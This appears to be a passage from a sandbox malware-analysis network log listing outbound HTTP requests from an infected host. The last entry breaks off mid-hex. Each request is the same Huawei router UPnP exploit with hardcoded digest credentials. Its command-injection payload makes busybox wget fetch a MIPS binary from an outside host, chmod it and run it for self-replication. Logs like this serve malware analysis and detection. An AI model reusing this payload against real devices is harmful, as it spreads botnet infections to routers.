                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  970192.168.2.1346740157.25.249.12037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.452081919 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  971192.168.2.1360198157.173.216.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.452127934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  972192.168.2.133332841.248.231.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453373909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  973192.168.2.1344540157.115.167.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453438044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  974192.168.2.135879899.50.113.3237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453459978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  975192.168.2.135154641.162.74.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453511953 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  976192.168.2.1345714197.212.139.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453526974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  977192.168.2.1351942157.191.186.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453542948 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  978192.168.2.1339846197.76.66.19237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.453569889 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  979192.168.2.135770241.203.144.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.454031944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 